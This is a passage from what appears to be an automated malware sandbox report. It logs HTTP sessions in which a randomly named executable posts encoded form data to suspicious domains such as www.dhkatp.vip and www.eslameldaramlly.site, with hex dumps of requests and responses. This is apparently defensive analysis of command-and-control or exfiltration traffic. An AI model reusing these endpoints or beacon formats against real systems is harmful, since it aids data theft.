3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 [TRUNCATED]
                                                    Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div></body></html>


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    8192.168.2.863700198.252.106.191806360C:\Program Files (x86)\CgEFJlVueYoFVNGMrHEvgxGdoSqTRCWfXpqWIUEFCqRiYrSDDYW\MpfhURuSBZcuS.exe
                                                    TimestampBytes transferredDirectionData
                                                    Sep 24, 2024 17:17:56.291909933 CEST462OUTGET /tuad/?L4Ml=COR99YL4ij4WSzIn9uKNQTj+/nF71npMJ8PUbDDmK/MOrLSwhgHAUUFmM9ZFV75zOrifp59AeN3Qrz+fk81rYB1Esp+MUB3RCvU15TDIEUASO5KKoulUwcQsQXQ4LVDRNA==&VX=XZGx- HTTP/1.1
                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                    Accept-Language: en-us
                                                    Host: www.suarahati20.xyz
                                                    Connection: close
                                                    User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; N9515 Build/KVT49L) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.141 Mobile Safari/537.36
                                                    Sep 24, 2024 17:17:56.930774927 CEST1033INHTTP/1.1 404 Not Found
                                                    Connection: close
                                                    cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                    pragma: no-cache
                                                    content-type: text/html
                                                    content-length: 796
                                                    date: Tue, 24 Sep 2024 15:17:56 GMT
                                                    server: LiteSpeed
                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 [TRUNCATED]
                                                    Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div></body></html>


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    9192.168.2.8637013.33.130.190806360C:\Program Files (x86)\CgEFJlVueYoFVNGMrHEvgxGdoSqTRCWfXpqWIUEFCqRiYrSDDYW\MpfhURuSBZcuS.exe
                                                    TimestampBytes transferredDirectionData
                                                    Sep 24, 2024 17:18:01.988341093 CEST716OUTPOST /u85y/ HTTP/1.1
                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                    Accept-Language: en-us
                                                    Accept-Encoding: gzip, deflate, br
                                                    Host: www.dhkatp.vip
                                                    Origin: http://www.dhkatp.vip
                                                    Referer: http://www.dhkatp.vip/u85y/
                                                    Content-Length: 205
                                                    Connection: close
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Cache-Control: no-cache
                                                    User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; N9515 Build/KVT49L) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.141 Mobile Safari/537.36
                                                    Data Raw: 4c 34 4d 6c 3d 39 44 66 35 66 54 64 67 38 38 4b 49 46 56 36 4f 39 65 58 55 61 77 4b 49 45 77 4c 58 38 4e 56 41 70 30 64 44 4f 62 46 57 49 50 47 61 64 38 65 43 57 54 66 39 68 71 47 51 74 4c 42 52 6b 68 57 54 36 54 6e 64 41 74 41 2b 37 73 56 34 37 35 6f 77 2b 44 4c 32 55 39 50 63 68 39 2f 78 43 5a 67 43 2b 79 57 57 7a 75 49 66 75 52 42 68 4d 59 35 46 55 4f 68 33 79 7a 4c 39 6d 58 70 76 6b 6f 4a 55 31 39 46 63 36 58 75 55 6e 52 76 30 42 7a 73 57 66 38 56 35 78 77 55 67 53 4f 65 46 63 64 76 42 64 72 79 78 2f 69 2f 42 75 63 4f 70 65 31 35 56 67 6c 46 69 70 50 44 74 4c 59 37 77 58 6d 4d 30 77 70 59 68 2b 54 6b 3d
                                                    Data Ascii: L4Ml=9Df5fTdg88KIFV6O9eXUawKIEwLX8NVAp0dDObFWIPGad8eCWTf9hqGQtLBRkhWT6TndAtA+7sV475ow+DL2U9Pch9/xCZgC+yWWzuIfuRBhMY5FUOh3yzL9mXpvkoJU19Fc6XuUnRv0BzsWf8V5xwUgSOeFcdvBdryx/i/BucOpe15VglFipPDtLY7wXmM0wpYh+Tk=


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    10192.168.2.8637023.33.130.190806360C:\Program Files (x86)\CgEFJlVueYoFVNGMrHEvgxGdoSqTRCWfXpqWIUEFCqRiYrSDDYW\MpfhURuSBZcuS.exe
                                                    TimestampBytes transferredDirectionData
                                                    Sep 24, 2024 17:18:04.539994955 CEST736OUTPOST /u85y/ HTTP/1.1
                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                    Accept-Language: en-us
                                                    Accept-Encoding: gzip, deflate, br
                                                    Host: www.dhkatp.vip
                                                    Origin: http://www.dhkatp.vip
                                                    Referer: http://www.dhkatp.vip/u85y/
                                                    Content-Length: 225
                                                    Connection: close
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Cache-Control: no-cache
                                                    User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; N9515 Build/KVT49L) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.141 Mobile Safari/537.36
                                                    Data Raw: 4c 34 4d 6c 3d 39 44 66 35 66 54 64 67 38 38 4b 49 48 31 71 4f 75 39 50 55 59 51 4b 4a 61 67 4c 58 31 74 56 45 70 30 42 44 4f 61 42 47 49 39 69 61 45 64 75 43 58 53 66 39 6d 71 47 51 31 62 42 55 36 52 57 59 36 53 61 75 41 74 4d 2b 37 73 42 34 37 39 67 77 2b 79 4c 31 56 74 50 65 30 74 2f 2f 50 35 67 43 2b 79 57 57 7a 71 6f 6c 75 52 5a 68 4d 72 68 46 54 66 68 30 78 7a 4c 2b 68 58 70 76 67 6f 4a 51 31 39 45 7a 36 53 4f 79 6e 53 48 30 42 79 63 57 66 70 68 34 36 77 55 6d 66 75 66 6d 5a 59 44 52 56 4b 69 5a 32 30 36 6e 67 38 43 63 62 44 55 2f 36 48 4e 6b 71 50 72 47 4c 62 54 47 53 52 52 63 71 4b 49 52 67 45 7a 77 39 36 2f 4f 46 30 6f 64 6e 46 69 44 70 45 59 75 58 55 4e 73
                                                    Data Ascii: L4Ml=9Df5fTdg88KIH1qOu9PUYQKJagLX1tVEp0BDOaBGI9iaEduCXSf9mqGQ1bBU6RWY6SauAtM+7sB479gw+yL1VtPe0t//P5gC+yWWzqoluRZhMrhFTfh0xzL+hXpvgoJQ19Ez6SOynSH0BycWfph46wUmfufmZYDRVKiZ206ng8CcbDU/6HNkqPrGLbTGSRRcqKIRgEzw96/OF0odnFiDpEYuXUNs


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    11192.168.2.8637033.33.130.190806360C:\Program Files (x86)\CgEFJlVueYoFVNGMrHEvgxGdoSqTRCWfXpqWIUEFCqRiYrSDDYW\MpfhURuSBZcuS.exe
                                                    TimestampBytes transferredDirectionData
                                                    Sep 24, 2024 17:18:07.087567091 CEST1753OUTPOST /u85y/ HTTP/1.1
                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                    Accept-Language: en-us
                                                    Accept-Encoding: gzip, deflate, br
                                                    Host: www.dhkatp.vip
                                                    Origin: http://www.dhkatp.vip
                                                    Referer: http://www.dhkatp.vip/u85y/
                                                    Content-Length: 1241
                                                    Connection: close
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Cache-Control: no-cache
                                                    User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; N9515 Build/KVT49L) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.141 Mobile Safari/537.36
                                                    Data Raw: 4c 34 4d 6c 3d 39 44 66 35 66 54 64 67 38 38 4b 49 48 31 71 4f 75 39 50 55 59 51 4b 4a 61 67 4c 58 31 74 56 45 70 30 42 44 4f 61 42 47 49 39 71 61 45 50 57 43 57 78 33 39 6e 71 47 51 39 37 42 56 36 52 57 4a 36 54 79 78 41 73 78 4c 37 75 35 34 36 66 34 77 70 33 72 31 4d 64 50 65 32 74 2f 79 43 5a 68 49 2b 7a 37 66 7a 75 45 6c 75 52 5a 68 4d 74 4e 46 46 65 68 30 33 7a 4c 39 6d 58 70 72 6b 6f 4a 6f 31 37 74 45 36 53 36 45 6e 6a 6e 30 42 52 6b 57 5a 62 35 34 34 51 55 6b 4d 65 66 41 5a 59 47 57 56 4b 2b 6b 32 30 6e 43 67 2b 53 63 5a 46 56 38 75 30 6c 62 79 73 66 75 50 37 48 6a 53 54 73 38 71 61 45 46 67 45 2f 52 78 62 50 77 53 31 59 53 74 58 33 62 7a 43 49 46 64 30 59 5a 6b 37 34 38 5a 73 37 32 30 41 63 77 4f 64 54 37 76 38 75 4d 39 76 37 7a 70 68 4d 65 65 67 45 4b 36 42 37 6a 71 62 71 78 76 73 75 48 45 75 70 54 68 6c 48 43 41 53 61 4e 72 31 34 52 4d 39 73 6a 73 70 52 39 6c 6a 2b 58 75 4b 6d 66 69 33 62 49 70 59 31 2b 68 6b 4c 49 44 36 6f 61 51 4d 58 5a 30 78 77 53 69 61 47 58 59 67 68 55 63 59 50 7a 6e [TRUNCATED]
                                                    Data Ascii: L4Ml=9Df5fTdg88KIH1qOu9PUYQKJagLX1tVEp0BDOaBGI9qaEPWCWx39nqGQ97BV6RWJ6TyxAsxL7u546f4wp3r1MdPe2t/yCZhI+z7fzuEluRZhMtNFFeh03zL9mXprkoJo17tE6S6Enjn0BRkWZb544QUkMefAZYGWVK+k20nCg+ScZFV8u0lbysfuP7HjSTs8qaEFgE/RxbPwS1YStX3bzCIFd0YZk748Zs720AcwOdT7v8uM9v7zphMeegEK6B7jqbqxvsuHEupThlHCASaNr14RM9sjspR9lj+XuKmfi3bIpY1+hkLID6oaQMXZ0xwSiaGXYghUcYPzn0sjoa5acApJiQRrHeYrPWgpDkF24m67t8P8pOe3VNyraK/JEiGtyv7T5O2iTVPph3HYWihNL+Oc1eUYP7FZkI8o4wOcSeScpLbE4JmHAv86fygJ3Mb1x+mjQvWhHMUmnP4+y/fNrE9nqg1l/9g7MGDnLSIXv/YAL3FjW9fQ19oebh2PlpVKIRe+If6CZI2r009EoeFJoOFuUGz2i1NUt05RdShUx6ZlmnrUKGNlcIXYSkBjbwJL3MRhr0JUJ6fq2CDnetCDW5MRhNQE+SR7aQ/9IkGNVTpa/w6BT7yDX35kmrCBxvg4UsniAWT/oaoE1muWmhwOgCbX2uW6VRuRcgEU0qRV9rV7pR5cwzdyltfR1Fke1uZfwacwXQKb73x09vhTGe8P/w97tGQB05qnPkRQiM8xo02afB9dUCvXP8Xu2iEgxH150/8OhuKpLpnu+eGTNNaOJFxHPHkqQLy3K8gXOsEANdw2Pzi4X/R2TF7LAJs6VlBO+7qGWs9k/yMKG+atRXK2cBNdrsLPjfDOb4fLrN4ni2LiWJdTo8H8W51wS//8/w+KCxpFhh59sfqZCgzysk9WpdAcHiTHrXhGGTcZ9OkVjxwtcKnKO28yYVURzqGpnsqmiJFPjg3Em7M4aMpahuGeCt/QzJlD63YJ84l5J8LTcNxGpZn [TRUNCATED]


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    12192.168.2.8637043.33.130.190806360C:\Program Files (x86)\CgEFJlVueYoFVNGMrHEvgxGdoSqTRCWfXpqWIUEFCqRiYrSDDYW\MpfhURuSBZcuS.exe
                                                    TimestampBytes transferredDirectionData
                                                    Sep 24, 2024 17:18:09.629841089 CEST457OUTGET /u85y/?VX=XZGx-&L4Ml=wB3ZcmNh1MmrIwfSzb/pYDfeTUzW6O1UjWNgVadWZuGYS/WrcxHhgLOrzo8qigeYzDjwJvcv1eEC2ecO3wCLRJj3wqTQMKM05jGtzaYfnBJ5M7wMOeAqnxHMoiYb58YbsA== HTTP/1.1
                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                    Accept-Language: en-us
                                                    Host: www.dhkatp.vip
                                                    Connection: close
                                                    User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; N9515 Build/KVT49L) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.141 Mobile Safari/537.36
                                                    Sep 24, 2024 17:18:10.103193045 CEST401INHTTP/1.1 200 OK
                                                    Server: openresty
                                                    Date: Tue, 24 Sep 2024 15:18:10 GMT
                                                    Content-Type: text/html
                                                    Content-Length: 261
                                                    Connection: close
                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 56 58 3d 58 5a 47 78 2d 26 4c 34 4d 6c 3d 77 42 33 5a 63 6d 4e 68 31 4d 6d 72 49 77 66 53 7a 62 2f 70 59 44 66 65 54 55 7a 57 36 4f 31 55 6a 57 4e 67 56 61 64 57 5a 75 47 59 53 2f 57 72 63 78 48 68 67 4c 4f 72 7a 6f 38 71 69 67 65 59 7a 44 6a 77 4a 76 63 76 31 65 45 43 32 65 63 4f 33 77 43 4c 52 4a 6a 33 77 71 54 51 4d 4b 4d 30 35 6a 47 74 7a 61 59 66 6e 42 4a 35 4d 37 77 4d 4f 65 41 71 6e 78 48 4d 6f 69 59 62 35 38 59 62 73 41 3d 3d 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                                                    Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?VX=XZGx-&L4Ml=wB3ZcmNh1MmrIwfSzb/pYDfeTUzW6O1UjWNgVadWZuGYS/WrcxHhgLOrzo8qigeYzDjwJvcv1eEC2ecO3wCLRJj3wqTQMKM05jGtzaYfnBJ5M7wMOeAqnxHMoiYb58YbsA=="}</script></head></html>


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    13192.168.2.863705148.251.114.233806360C:\Program Files (x86)\CgEFJlVueYoFVNGMrHEvgxGdoSqTRCWfXpqWIUEFCqRiYrSDDYW\MpfhURuSBZcuS.exe
                                                    TimestampBytes transferredDirectionData
                                                    Sep 24, 2024 17:18:15.231565952 CEST746OUTPOST /30vc/ HTTP/1.1
                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                    Accept-Language: en-us
                                                    Accept-Encoding: gzip, deflate, br
                                                    Host: www.eslameldaramlly.site
                                                    Origin: http://www.eslameldaramlly.site
                                                    Referer: http://www.eslameldaramlly.site/30vc/
                                                    Content-Length: 205
                                                    Connection: close
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Cache-Control: no-cache
                                                    User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; N9515 Build/KVT49L) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.141 Mobile Safari/537.36
                                                    Data Raw: 4c 34 4d 6c 3d 70 71 6a 4e 46 35 50 42 77 4d 43 55 70 35 65 74 43 59 6f 35 7a 70 52 76 66 72 39 52 6c 61 63 55 56 79 79 43 42 5a 5a 52 43 58 72 74 52 61 42 32 37 74 64 6b 6d 4a 32 2b 42 4a 50 41 36 42 6f 59 57 2b 70 54 57 4f 78 6e 65 56 77 30 4a 52 39 4b 55 39 4b 7a 50 50 66 36 58 54 68 2b 2b 31 34 4c 77 33 6e 64 5a 70 4a 4d 35 36 64 68 5a 6e 52 46 55 2b 52 4c 39 5a 4d 76 6d 5a 68 53 45 47 54 50 69 5a 75 59 5a 79 74 45 31 52 53 57 42 6a 30 33 54 39 45 6d 42 58 41 72 39 48 39 59 30 6a 46 45 42 59 6d 32 42 36 70 66 77 71 76 56 56 78 61 41 59 44 48 50 6f 2b 45 4d 38 79 76 38 52 56 52 62 77 72 55 58 6d 66 30 3d
                                                    Data Ascii: L4Ml=pqjNF5PBwMCUp5etCYo5zpRvfr9RlacUVyyCBZZRCXrtRaB27tdkmJ2+BJPA6BoYW+pTWOxneVw0JR9KU9KzPPf6XTh++14Lw3ndZpJM56dhZnRFU+RL9ZMvmZhSEGTPiZuYZytE1RSWBj03T9EmBXAr9H9Y0jFEBYm2B6pfwqvVVxaAYDHPo+EM8yv8RVRbwrUXmf0=
                                                    Sep 24, 2024 17:18:15.912343979 CEST1236INHTTP/1.1 404 Not Found
                                                    Connection: close
                                                    cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                    pragma: no-cache
                                                    content-type: text/html
                                                    content-length: 1238
                                                    date: Tue, 24 Sep 2024 15:18:15 GMT
                                                    server: LiteSpeed
                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 [TRUNCATED]
                                                    Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div><div style="color:#f0f0f0; font-size:12px;margin:auto;padding:0px 30px 0px 30px;position:relative;clear:both;height:100px;margin-top:-101px;background-color:#474747;border-top: 1px solid rgba(0,0,0,0.15);box-shadow: 0 1px 0 rgba(255, 255, 255, 0.3) inset;"><br>Proudly powered by <a style="color:#fff;"
                                                    Sep 24, 2024 17:18:15.912442923 CEST240INData Raw: 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 6c 69 74 65 73 70 65 65 64 74 65 63 68 2e 63 6f 6d 2f 65 72 72 6f 72 2d 70 61 67 65 22 3e 4c 69 74 65 53 70 65 65 64 20 57 65 62 20 53 65 72 76 65 72 3c 2f 61 3e 3c 70 3e 50 6c 65 61 73 65 20 62
                                                    Data Ascii: href="http://www.litespeedtech.com/error-page">LiteSpeed Web Server</a><p>Please be advised that LiteSpeed Technologies Inc. is not a web hosting company and, as such, has no control over content found on this site.</p></div></body></html>


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    14192.168.2.863706148.251.114.233806360C:\Program Files (x86)\CgEFJlVueYoFVNGMrHEvgxGdoSqTRCWfXpqWIUEFCqRiYrSDDYW\MpfhURuSBZcuS.exe
                                                    TimestampBytes transferredDirectionData
                                                    Sep 24, 2024 17:18:17.979477882 CEST766OUTPOST /30vc/ HTTP/1.1
                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                    Accept-Language: en-us
                                                    Accept-Encoding: gzip, deflate, br
                                                    Host: www.eslameldaramlly.site
                                                    Origin: http://www.eslameldaramlly.site
                                                    Referer: http://www.eslameldaramlly.site/30vc/
                                                    Content-Length: 225
                                                    Connection: close
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Cache-Control: no-cache
                                                    User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; N9515 Build/KVT49L) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.141 Mobile Safari/537.36
                                                    Data Raw: 4c 34 4d 6c 3d 70 71 6a 4e 46 35 50 42 77 4d 43 55 70 59 75 74 52 70 6f 35 69 5a 52 77 61 72 39 52 72 36 63 51 56 79 75 43 42 59 4d 4a 43 68 62 74 52 37 78 32 36 6f 70 6b 6a 4a 32 2b 4c 70 50 46 31 68 70 55 57 2b 6c 68 57 4f 64 6e 65 56 55 30 4a 51 74 4b 56 4e 32 77 4e 66 66 30 44 6a 68 38 36 31 34 4c 77 33 6e 64 5a 70 4e 6d 35 2b 78 68 59 58 68 46 56 66 52 4d 68 4a 4d 6f 68 5a 68 53 53 32 53 6e 69 5a 75 36 5a 32 4e 75 31 53 36 57 42 69 45 33 55 70 51 6c 4b 58 41 74 7a 6e 38 70 36 32 34 4c 49 66 71 4d 43 63 73 77 2f 36 37 51 51 48 33 71 43 68 50 4a 72 2b 73 6e 38 78 48 4b 55 69 4d 7a 71 49 45 6e 34 49 67 58 53 31 31 6d 50 76 34 32 52 7a 59 6b 4f 58 4b 67 45 51 37 49
                                                    Data Ascii: L4Ml=pqjNF5PBwMCUpYutRpo5iZRwar9Rr6cQVyuCBYMJChbtR7x26opkjJ2+LpPF1hpUW+lhWOdneVU0JQtKVN2wNff0Djh8614Lw3ndZpNm5+xhYXhFVfRMhJMohZhSS2SniZu6Z2Nu1S6WBiE3UpQlKXAtzn8p624LIfqMCcsw/67QQH3qChPJr+sn8xHKUiMzqIEn4IgXS11mPv42RzYkOXKgEQ7I
                                                    Sep 24, 2024 17:18:18.520565033 CEST1236INHTTP/1.1 404 Not Found
                                                    Connection: close
                                                    cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                    pragma: no-cache
                                                    content-type: text/html
                                                    content-length: 1238
                                                    date: Tue, 24 Sep 2024 15:18:18 GMT
                                                    server: LiteSpeed
                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 [TRUNCATED]
                                                    Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div><div style="color:#f0f0f0; font-size:12px;margin:auto;padding:0px 30px 0px 30px;position:relative;clear:both;height:100px;margin-top:-101px;background-color:#474747;border-top: 1px solid rgba(0,0,0,0.15);box-shadow: 0 1px 0 rgba(255, 255, 255, 0.3) inset;"><br>Proudly powered by <a style="color:#fff;"
                                                    Sep 24, 2024 17:18:18.520747900 CEST240INData Raw: 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 6c 69 74 65 73 70 65 65 64 74 65 63 68 2e 63 6f 6d 2f 65 72 72 6f 72 2d 70 61 67 65 22 3e 4c 69 74 65 53 70 65 65 64 20 57 65 62 20 53 65 72 76 65 72 3c 2f 61 3e 3c 70 3e 50 6c 65 61 73 65 20 62
                                                    Data Ascii: href="http://www.litespeedtech.com/error-page">LiteSpeed Web Server</a><p>Please be advised that LiteSpeed Technologies Inc. is not a web hosting company and, as such, has no control over content found on this site.</p></div></body></html>


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    15192.168.2.863707148.251.114.233806360C:\Program Files (x86)\CgEFJlVueYoFVNGMrHEvgxGdoSqTRCWfXpqWIUEFCqRiYrSDDYW\MpfhURuSBZcuS.exe
                                                    TimestampBytes transferredDirectionData
                                                    Sep 24, 2024 17:18:20.599899054 CEST1783OUTPOST /30vc/ HTTP/1.1
                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                    Accept-Language: en-us
                                                    Accept-Encoding: gzip, deflate, br
                                                    Host: www.eslameldaramlly.site
                                                    Origin: http://www.eslameldaramlly.site
                                                    Referer: http://www.eslameldaramlly.site/30vc/
                                                    Content-Length: 1241
                                                    Connection: close
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Cache-Control: no-cache
                                                    User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; N9515 Build/KVT49L) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.141 Mobile Safari/537.36
